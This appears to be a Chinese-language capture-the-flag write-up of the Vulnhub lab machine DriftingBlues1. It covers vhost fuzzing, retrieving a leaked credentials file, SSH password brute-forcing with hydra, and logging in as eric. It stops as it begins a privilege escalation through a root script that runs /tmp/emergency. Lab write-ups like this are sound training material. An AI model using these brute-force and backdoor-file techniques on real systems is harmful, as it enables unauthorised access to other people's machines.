Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook.
返回的是Ook编码信息,通过在线网站解码:
https://www.splitbrain.org/services/ook
my man, i know you are new but you should know how to use host file to reach our secret location. -eric
host file?
而首页中有邮箱:[email protected] for more info.
所以主机是driftingblues.box
使用主机文件找到秘密位置?这是啥意思呢?
不过至此已经知道了两个可能的用户名: sheryl, eric
参考别人的做法,此时应该是对子域名进行爆破
用gobuster 工具没有成功爆破
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ gobuster vhost -u driftingblues.box -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://driftingblues.box
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
2023/01/14 09:23:51 Starting gobuster in VHOST enumeration mode
改用wfuzz工具
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ wfuzz -c -u 'driftingblues.box' -H "Host:FUZZ.driftingblues.box" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 570
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://driftingblues.box/
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 12 L 53 W 430 Ch "# directory-list-2.3-medium.txt"
000000003: 400 12 L 53 W 430 Ch "# Copyright 2007 James Fisher"
000000007: 400 12 L 53 W 430 Ch "# license, visit http://creativecommons.org/licenses/by-sa/
3.0/"
000000011: 400 12 L 53 W 430 Ch "# Priority ordered case sensative list, where entries were
found"
000000012: 400 12 L 53 W 430 Ch "# on atleast 2 different hosts"
000000013: 400 12 L 53 W 430 Ch "#"
000000010: 400 12 L 53 W 430 Ch "#"
000000009: 400 12 L 53 W 430 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000006: 400 12 L 53 W 430 Ch "# Attribution-Share Alike 3.0 License. To view a copy of th
is"
000000008: 400 12 L 53 W 430 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000002: 400 12 L 53 W 430 Ch "#"
000000005: 400 12 L 53 W 430 Ch "# This work is licensed under the Creative Commons"
000000004: 400 12 L 53 W 430 Ch "#"
000000611: 200 5 L 4 W 24 Ch "test"
将test.driftingblues.box加入/etc/hosts文件中:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ curl http://test.driftingblues.box/
work
in
progress
-eric
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ curl http://test.driftingblues.box/robots.txt
User-agent: *
Disallow: /ssh_cred.txt
Allow: /never
Allow: /never/gonna
Allow: /never/gonna/give
Allow: /never/gonna/give/up
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ wget http://test.driftingblues.box/ssh_cred.txt
--2023-01-14 09:34:06-- http://test.driftingblues.box/ssh_cred.txt
Resolving test.driftingblues.box (test.driftingblues.box)... 192.168.56.208
Connecting to test.driftingblues.box (test.driftingblues.box)|192.168.56.208|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 147 [text/plain]
Saving to: ‘ssh_cred.txt’
ssh_cred.txt 100%[====================================================>] 147 --.-KB/s in 0s
2023-01-14 09:34:06 (50.6 MB/s) - ‘ssh_cred.txt’ saved [147/147]
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ ls
hydra.restore nmap_full_scan noteforkingfish.txt ssh_cred.txt
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ cat ssh_cred.txt
we can use ssh password in case of emergency. it was "1mw4ckyyucky".
sheryl once told me that she added a number to the end of the password.
-db
按照ssh_cred.txt的信息,用户名应该是sheryl, 最不济应该是db,结果破解失败,最后还是用了之前所发现的用户名eric
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ vim dict
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ cat dict
1mw4ckyyucky0
1mw4ckyyucky1
1mw4ckyyucky2
1mw4ckyyucky3
1mw4ckyyucky4
1mw4ckyyucky5
1mw4ckyyucky6
1mw4ckyyucky7
1mw4ckyyucky8
1mw4ckyyucky9
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ hydra -l sheryl -P dict ssh://192.168.56.208
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-14 09:37:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:1/p:10), ~1 try per task
[DATA] attacking ssh://192.168.56.208:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-14 09:37:50
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ hydra -l db -P dict ssh://192.168.56.208
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-14 09:39:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:1/p:10), ~1 try per task
[DATA] attacking ssh://192.168.56.208:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-14 09:39:11
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ hydra -l eric -P dict ssh://192.168.56.208
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-14 09:39:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:1/p:10), ~1 try per task
[DATA] attacking ssh://192.168.56.208:22/
[22][ssh] host: 192.168.56.208 login: eric password: 1mw4ckyyucky6
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-14 09:39:20
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-123-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
eric@driftingblues:~$ id
uid=1001(eric) gid=1001(eric) groups=1001(eric)
eric@driftingblues:~$ sudo -l
sudo: unable to resolve host driftingblues: Connection refused
[sudo] password for eric:
Sorry, user eric may not run sudo on driftingblues.
eric@driftingblues:~$ ls -alh
total 116K
drwxr-xr-x 16 eric eric 4,0K Ara 11 2020 .
drwxr-xr-x 3 root root 4,0K Ara 11 2020 ..
-rw------- 1 eric eric 16 Ara 11 2020 .bash_history
-rw-r--r-- 1 eric eric 220 Ara 10 2020 .bash_logout
-rw-r--r-- 1 eric eric 3,7K Ara 10 2020 .bashrc
drwx------ 3 eric eric 4,0K Oca 14 17:39 .cache
drwx------ 6 eric eric 4,0K Ara 11 2020 .config
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Desktop
-rw-r--r-- 1 eric eric 25 Ara 11 2020 .dmrc
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Documents
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Downloads
-rw-r--r-- 1 eric eric 8,8K Ara 10 2020 examples.desktop
drwx------ 2 eric eric 4,0K Ara 11 2020 .gconf
drwx------ 3 eric eric 4,0K Ara 11 2020 .gnupg
-rw------- 1 eric eric 1,7K Ara 11 2020 .ICEauthority
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Music
drwxrwxr-x 2 eric eric 4,0K Ara 11 2020 .nano
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Pictures
-rw-r--r-- 1 eric eric 655 Ara 10 2020 .profile
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Public
drwx------ 2 eric eric 4,0K Ara 11 2020 .ssh
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Templates
-rw-rw-r-- 1 eric eric 1,8K Ara 11 2020 user.txt
drwxr-xr-x 2 eric eric 4,0K Ara 11 2020 Videos
-rw------- 1 eric eric 58 Ara 11 2020 .Xauthority
-rw------- 1 eric eric 1,4K Ara 11 2020 .xsession-errors
-rw------- 1 eric eric 1,3K Ara 11 2020 .xsession-errors.old
eric@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
eric@driftingblues:~$
提权
eric@driftingblues:/var/backups$ cat backup.sh
#!/bin/bash
/usr/bin/zip -r -0 /tmp/backup.zip /var/www/
/bin/chmod
#having a backdoor would be nice
sudo /tmp/emergency
eric@driftingblues:/var/backups$ ls -alh backup.sh
-r--r--r-x 1 root root 123 Ara 11 2020 backup.sh
eric@driftingblues:/var/backups$ ls /tmp/emergency
ls: cannot access '/tmp/emergency': No such file or directory
是不是可以创建emergency文件,以获得root的shell?